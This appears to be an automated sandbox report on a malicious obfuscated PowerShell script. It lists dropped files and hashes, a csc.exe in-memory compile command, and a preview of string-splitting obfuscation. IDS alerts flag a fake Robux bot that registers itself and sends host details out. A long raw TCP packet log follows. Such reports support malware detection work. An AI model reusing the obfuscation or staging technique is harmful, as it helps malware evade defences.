                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23frozxs7+AEszIcNwi23frl:p37Lvkmb6KwZjoWZEJZjl
                                                                                  MD5:BD03AFD5784D5818D82797026EFFD511
                                                                                  SHA1:E03B484FDD32E02126494F1078D66CEC6999577A
                                                                                  SHA-256:9FF42EDB35F86681493D21AF524B2FCD0C87596EE23C7E3BF708A2BA5D5EDE1B
                                                                                  SHA-512:CB570806EDA497E87450DCE5EE794D2682ECBFCD0A13CDA281A17E8C7A36CCDE51116A01D72478F9B8DEF2D30230EF8FC8A1E76CE61BDD3222C9BB991E648B78
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.9829599233523396
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6fpLNvhfeRPBFLMKhSJeCXumwRvV1ul8a3wq:8JhfeR5dj1G6K
                                                                                  MD5:BF544971CDB90053D2744E018A2E81A8
                                                                                  SHA1:CABF0857B235B5F5DC15F50D67E7F8B20529EEDA
                                                                                  SHA-256:2154A02EA85C54820A21DA3AAC60FB87698A1C33F02304E3C440F6562F44D942
                                                                                  SHA-512:814E6D69A1F85A4C05658D38D3BF3A04198BF909C4C78D8B1549469727EF313E261A3C885FC5EC5F7E9588F479218EFFCD0FBDEAB5470171364266C9B83CFC0A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (460), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):881
                                                                                  Entropy (8bit):5.317295747148393
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:KwId3ka6Kg1Ev0Kax5DqBVKVrdFAMBJTH:xkka671Ev0K2DcVKdBJj
                                                                                  MD5:C4D6D3B69F432F7A245B38DFFD846212
                                                                                  SHA1:B47B41DFD5403CC98CA9E569E332061A792F194D
                                                                                  SHA-256:82046153157302B9470F8E1AD16C9507EF1E1EAF131CC7E2BBD2CCF1A58C62E3
                                                                                  SHA-512:2770FF41A7F93AFC3794690438570466B453EE6780878A6053BD16AF77F36F8F648762215E854BD0F4082B8406FE0778382A2EA665DB71F47D6BE1EE87FF0DFF
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7418218180837264
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3RNeECorlkvhkvCCtO1UY00vH11UY00nHu:3RNeMtOSYvSYg
                                                                                  MD5:9F83BFC212A48F0FFBFD2775DD62A0D5
                                                                                  SHA1:0A399389B260E15F9BB692C432B9A1A3DE093189
                                                                                  SHA-256:923A2CE40F365DA0C63CABD751BDFE054635C513052D0AEB61002895E0059B7E
                                                                                  SHA-512:6144EF72BBE9522AC7F0289833CCC0309409A7F77F8EC1E2D6B966790050CDBC24CE0E9F87B862EFD4FB8E8C43263806518733B7E36A19639157FB0F9F5BB605
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_......j....z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....".f.......j........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=OY............................3*N.A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EW.=OY................................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=OY................................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=OY............................l.9.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=OY......................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=OY......................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=OY......9...........
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                  File type:ASCII text, with very long lines (17986)
                                                                                  Entropy (8bit):3.907629029493936
                                                                                  TrID:
                                                                                    File name:cr_asm3.ps1
                                                                                    File size:27'651 bytes
                                                                                    MD5:b1e2bf28f0bb077edc92a81173ccbbfa
                                                                                    SHA1:425c6a7ae95888820b4411730475fa9b19cdb6f3
                                                                                    SHA256:682551bed0e0e7aaba3274d84d5fc80a04b926ac1e4a78e5e312eb2ffd7a5012
                                                                                    SHA512:a042101eb839273832e6347517ed51c94ed6b2e512276de5036c0ccd49c2552a01aa758e638a5da5bbe3add11c7a54f4d9afd2e614aef5a9f5f7d1f10d38b600
                                                                                    SSDEEP:192:ZaevAOBMDy2fNXj5GA+uOgMsM1wpFshbwqUdMVii2H:RvtODy2fNXj5GA+tlFb3UaUH
                                                                                    TLSH:A5C2A9F6B318509FBAC7AF9CC3455192D26DD17123E0594BFBAD880EEACAC53502076E
                                                                                    File Content Preview:$P1 = 'S'; $P2 = 'y'; $P3 = 's'; $P4 = 't'; $P5 = 'e'; $P6 = 'm'.$Sys = $P1 + $P2 + $P3 + $P4 + $P5 + $P6..$M1 = 'M'; $M2 = 'a'; $M3 = 'n'; $M4 = 'a'; $M5 = 'g'; $M6 = 'e'; $M7 = 'm'; $M8 = 'e'; $M9 = 'n'; $M10 = 't'.$Mgmt = $M1 + $M2 + $M3 + $M4 + $M5 +
                                                                                    Icon Hash:3270d6baae77db44
                                                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                    2024-10-15T18:08:12.766333+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49703 | 185.199.109.133 | 443 | TCP
                                                                                    2024-10-15T18:08:27.991660+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.7 | 49775 | 162.159.138.232 | 443 | TCP
                                                                                    2024-10-15T18:08:42.150593+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 49852 | 162.159.138.232 | 443 | TCP
                                                                                    2024-10-15T18:08:49.372385+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 49889 | 162.159.138.232 | 443 | TCP
                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Oct 15, 2024 18:08:10.576301098 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.576349020 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:10.576425076 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.587518930 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:10.587554932 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.211010933 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.211098909 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.216873884 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.216892958 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.217212915 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.231057882 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.271409035 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458034039 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458276987 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458304882 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458338976 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.458359957 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.458533049 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.458813906 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469552040 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469629049 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.469640017 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469679117 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.469722986 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.469728947 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.512402058 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.579438925 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.579499960 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.579556942 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.579586983 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580100060 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580130100 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580142975 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.580153942 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.580197096 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.580203056 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591339111 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591408014 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.591415882 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591778994 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.591829062 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.591836929 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.637386084 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705018044 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705106020 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705132008 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705152035 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705167055 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705213070 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.705219030 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705234051 CEST | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.705277920 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.759860992 CEST | 49701 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.775923014 CEST | 49703 | 443 | 192.168.2.7 | 185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.775975943 CEST | 443 | 49703 | 185.199.109.133 | 192.168.2.7
                                                                                    Oct 15, 2024 18:08:11.776043892 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.776375055 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:11.776386023 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.473546982 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.475048065 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.475066900 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766329050 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766652107 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766679049 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766702890 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766707897 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.766722918 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.766747952 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.769102097 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.769155025 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.769169092 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.772355080 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.772416115 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.772427082 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.824879885 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.894630909 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894821882 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894893885 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.894906998 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.894984007 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895032883 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.895037889 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895275116 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.895350933 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.895356894 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.897670984 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.897763968 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.897774935 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.947552919 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.947791100 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:12.947808981 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:12.996757984 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025072098 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025470972 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025527954 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025542974 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025815010 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.025860071 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.025867939 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.074882984 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.085314035 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.085397005 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.085447073 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.085465908 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086117029 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086155891 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086158991 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.086169004 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.086205006 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.157718897 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.157923937 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158005953 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.158024073 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158402920 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.158449888 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.158461094 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.161937952 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.161988020 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.162003994 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212671995 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212713957 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212776899 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.212795973 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.212836027 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.213002920 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.213151932 CEST44349703185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:13.213203907 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:13.280268908 CEST49703443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:24.753350973 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.759293079 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:24.759372950 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.761657953 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:24.767484903 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.440244913 CEST8049759104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.445009947 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.445060015 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.445122957 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.450093031 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:25.450118065 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:25.567027092 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.103831053 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.103907108 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.107369900 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.107382059 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.107701063 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.117588997 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.163395882 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265484095 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265575886 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265826941 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.282135963 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.341139078 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.346061945 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.346143961 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.352574110 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.357383013 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.974811077 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.975440025 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.979686022 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.979763985 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.980165005 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.980195045 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.980400085 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.980797052 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.983407974 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.983419895 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.133083105 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133116961 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.133332014 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133714914 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133730888 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.593990088 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.594058037 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.601486921 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.601499081 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.601792097 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.603568077 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.647392988 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729650974 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729840994 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729866982 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729887962 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.729897022 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729908943 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729954958 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.730113029 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.730113029 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.730128050 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.741744995 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.741791964 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.754092932 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.754162073 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.755985975 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.755996943 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.756258965 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.764025927 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.764661074 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.811415911 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.811487913 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.811501026 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991686106 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991745949 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991786957 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:28.000906944 CEST49775443192.168.2.7162.159.138.232
